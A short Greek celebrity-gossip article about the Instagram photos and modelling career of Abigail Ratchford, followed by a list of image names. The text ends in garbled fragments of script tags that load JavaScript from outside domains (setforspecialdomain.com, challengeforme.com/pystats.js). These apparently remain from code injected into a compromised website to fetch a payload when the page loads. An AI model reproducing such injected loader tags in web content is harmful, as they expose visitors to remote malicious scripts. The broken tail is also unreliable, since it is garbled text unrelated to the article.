Το καυτό Instagram της Abigail Ratchford

abigail-ratchford-090414-6

Καταπράσινο βλέμμα και ωραίο πρόσωπο. Ποιος μπορεί όμως να εστιάσει στην ομορφιά της Abigail Ratchford όταν δει το γεμάτο καμπύλες κορμί της και το πληθωρικό στήθος της.

Το μοντέλο από την Πενσιλβάνια των ΗΠΑ κατάφερε σε σύντομο χρονικό διάστημα να περπατήσει στις πασαρέλες και να ποζάρει για μεγάλα αντρικά περιοδικά χρησιμοποιώντας έξυπνα τα social media. Ανεβάζοντας συνέχεια φωτογραφίες της κατάφερε να γίνει γνωστή στον χώρο της μόδας και του lifestyle αλλά κυρίως στο αντρικό κοινό.

Η εξωτερική της εμφάνιση της άνοιξε πολλές πόρτες τόσο στον κόσμο της μόδας όσο και στο χώρο του θεάματος δίνοντάς της δυνατότητα να κάνει ένα μικρό πέρασμα από την αμερικανική τηλεόραση και τον κινηματογράφο.

abigailratchford10abigailratchford4abigailratchford8abigailratchford2abigailratchford3abigailratchford1abigailratchford6abigailratchford7abigailratchford9___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >